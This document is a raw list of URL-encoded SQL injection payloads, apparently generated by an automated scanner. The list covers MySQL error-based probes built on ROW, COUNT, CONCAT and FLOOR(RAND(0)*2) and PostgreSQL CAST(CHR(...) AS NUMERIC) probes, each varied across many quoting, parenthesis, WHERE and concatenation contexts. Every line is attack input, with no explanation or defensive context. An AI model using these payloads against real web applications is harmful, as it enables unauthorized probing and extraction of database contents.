foo%27%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27ehmY%27%3D%27ehmY foo%27%29%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27KlHs%27%3D%27KlHs foo%27%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27NGCj%27%3D%27NGCj foo%27%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27Oovf%27%20LIKE%20%27Oovf foo%27%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27sXsr%27%20LIKE%20%27sXsr foo%27%29%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27WflR%27%20LIKE%20%27WflR foo%27%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27xjHu%27%20LIKE%20%27xjHu foo%22%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22yzmm%22%3D%22yzmm foo%22%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22bAMY%22%3D%22bAMY foo%22%29%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22EFDC%22%3D%22EFDC foo%22%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22tGPR%22%3D%22tGPR foo%22%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22pqsV%22%20LIKE%20%22pqsV foo%22%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22uZMy%22%20LIKE%20%22uZMy foo%22%29%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22ftrW%22%20LIKE%20%22ftrW foo%22%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22LKgd%22%20LIKE%20%22LKgd foo%29%20WHERE%204950%3D4950%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%27%29%20WHERE%202862%3D2862%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%27%20WHERE%206228%3D6228%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%22%20WHERE%209306%3D9306%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%27%20%7C%7C%20%28SELECT%203204%20FROM%20DUAL%20WHERE%201841%3D1841%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206519%20WHERE%202464%3D2464%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%201112%20FROM%20DUAL%20WHERE%205970%3D5970%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29 foo%20%2B%20%28SELECT%201928%20WHERE%209442%3D9442%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29 foo%27%20%2B%20%28SELECT%20%27QIQE%27%20FROM%20DUAL%20WHERE%208891%3D8891%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27kpiQ%27%20WHERE%203342%3D3342%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%23 foo%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%27%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%27%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%22%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%281836%3D1836 foo%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%284284%3D4284 foo%29%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%287291%3D7291 foo%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%27%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27ElKj%27%3D%27ElKj foo%27%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27UFcx%27%3D%27UFcx foo%27%29%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27CNTs%27%3D%27CNTs foo%27%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27osEN%27%3D%27osEN foo%27%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27KMVK%27%20LIKE%20%27KMVK foo%27%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27dbHl%27%20LIKE%20%27dbHl foo%27%29%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27aOoJ%27%20LIKE%20%27aOoJ foo%27%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27UrTY%27%20LIKE%20%27UrTY foo%22%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22cbpN%22%3D%22cbpN foo%22%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22tJjv%22%3D%22tJjv foo%22%29%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22ISYw%22%3D%22ISYw foo%22%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22NGBk%22%3D%22NGBk foo%22%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22xCiA%22%20LIKE%20%22xCiA foo%22%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22jdfZ%22%20LIKE%20%22jdfZ foo%22%29%29%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22cSVi%22%20LIKE%20%22cSVi foo%22%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22zdxH%22%20LIKE%20%22zdxH foo%29%20WHERE%201646%3D1646%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%27%29%20WHERE%203811%3D3811%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%27%20WHERE%202892%3D2892%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%22%20WHERE%207696%3D7696%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 foo%27%20%7C%7C%20%28SELECT%201184%20FROM%20DUAL%20WHERE%203441%3D3441%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203555%20WHERE%202772%3D2772%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202992%20FROM%20DUAL%20WHERE%208396%3D8396%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29 foo%20%2B%20%28SELECT%207208%20WHERE%209311%3D9311%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29 foo%27%20%2B%20%28SELECT%20%27uuTo%27%20FROM%20DUAL%20WHERE%205391%3D5391%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%2B%20%27 